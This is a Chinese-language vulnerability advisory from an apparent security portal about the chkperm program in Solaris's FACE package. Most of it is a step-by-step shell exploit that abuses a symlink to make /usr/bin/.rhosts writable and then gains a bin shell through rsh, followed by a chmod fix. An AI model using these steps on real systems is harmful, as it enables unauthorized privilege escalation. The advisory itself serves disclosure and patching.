您好,欢迎访问一九零五行业门户网

Access Command Environment包含的漏洞

涉及程序: face软件包中的chkperm 描述: access command environment包含的漏洞 详细: solaris 2.4, 2.5, and 2.5.1 (可能还有其他系统) 安装了一个叫 face (framed access command environment)的软件包。在这个软件包 中有一个程序chkperm是问题所在,
涉及程序:
face软件包中的chkperm
描述:
access command environment包含的漏洞
详细:
solaris 2.4, 2.5, and 2.5.1 (可能还有其他系统) 安装了一个叫 face (framed access command environment)的软件包。在这个软件包 中有一个程序chkperm是问题所在,他是用来用户是否有使用face许可的程序。 这漏洞将可以轻易造出一个bin用户。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -r 777 /tmp/foo
% setenv vmsys /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 0 nov 12 09:41 .rhosts
% echo + + >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 4 nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
warning: no access to tty; thus no job control in this shell... % id
uid=2(bin) gid=2(bin)
受影响的系统;
安装了(faceframed access command environment)solaris 2.4, 2.5 (?), 2.5.1(?) and 或其他源于system v 的unix系统。
解决方案:
cnns为您提供完善的网络安全服务。
安全建议:
% chmod ug-s /usr/vmsys/bin/chkperm
其它类似信息

推荐信息